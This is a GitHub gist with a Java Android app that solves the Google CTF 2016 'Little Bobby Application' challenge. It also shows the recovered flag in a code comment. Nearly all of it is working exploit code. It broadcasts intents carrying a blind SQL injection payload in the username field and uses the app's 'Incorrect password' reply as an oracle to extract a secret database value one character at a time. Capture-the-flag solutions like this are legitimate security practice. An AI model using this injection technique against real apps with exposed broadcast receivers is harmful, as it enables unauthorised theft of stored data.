Skip to content

Instantly share code, notes, and snippets.

@bburky
Created May 1, 2016 17:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bburky/9af1f82c8c1bb5dfb60624bef7762825 to your computer and use it in GitHub Desktop.
Save bburky/9af1f82c8c1bb5dfb60624bef7762825 to your computer and use it in GitHub Desktop.
Google CTF 2016 - Little Bobby Application solution
package com.bburky.bobbyapplication_exploit;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.support.v7.app.ActionBarActivity;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
public class MainActivity extends ActionBarActivity {
// ctf{An injection is all you need to get this flag - 08fdc2c757be2ea1067f0c36d4ca2634}
private final String flagPrefix = "ctf{An injection is all you need to get this flag - ";
private char currentChar = '0';
private int index = flagPrefix.length() + 1;
private String flag = "";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Log.w("exploit", "Starting exploit...");
IntentFilter intentFilter = new IntentFilter("com.bobbytables.ctf.myapplication_OUTPUTINTENT");
registerReceiver(new Receiver(), intentFilter);
getNextFlagCharacter();
}
private void getNextFlagCharacter() {
String injection = "\" or substr(flag," + index + ",1)=\"" + currentChar + "\" --";
Intent intent = new Intent("com.bobbytables.ctf.myapplication_INTENT");
intent.putExtra("username", injection);
intent.putExtra("password", "");
sendBroadcast(intent);
}
private class Receiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
String msg = intent.getStringExtra("msg");
boolean result = msg.equals("Incorrect password");
if (!result) {
if (currentChar == '9') {
currentChar = 'a';
} else {
currentChar++;
}
getNextFlagCharacter();
return;
}
flag += currentChar;
currentChar = '0';
index++;
if (index < flagPrefix.length() + 33) {
getNextFlagCharacter();
} else {
Log.w("exploit", flagPrefix + flag + "}");
}
TextView text = (TextView) findViewById(R.id.text);
text.setText(flagPrefix + flag + "}");
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment